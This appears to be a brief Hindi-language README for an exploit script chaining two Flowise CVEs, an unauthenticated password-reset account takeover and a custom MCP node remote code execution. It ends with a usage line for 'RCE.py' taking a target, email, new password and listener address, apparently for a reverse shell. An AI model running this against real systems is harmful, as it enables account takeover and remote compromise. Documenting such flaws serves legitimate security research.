
CVE-2025-58434 Flowise <= 3.0.5 और इससे पहले के संस्करण अनधिकृत फ़ॉरगॉट-पासवर्ड टोकन के माध्यम से खाता अधिग्रहण (account takeover) की अनुमति देते हैं। CVE-2025-59528 lowiseAI कस्टम MCP नोड रिमोट कोड निष्पादन (Remote Code Execution)।
CVE-2025-58434 Flowise <= 3.0.5 और इससे पहले के संस्करणों में अप्रमाणित पासवर्ड-भूल गए टोकन के माध्यम से खाता अधिग्रहण संभव है। CVE-2025-59528 flowiseAI कस्टम MCP नोड रिमोट कोड निष्पादन।
python3 RCE.py -d "example.com" -e "[email protected]" -np "Password@a123" -lh <IP_addr> -lp <Listening_port>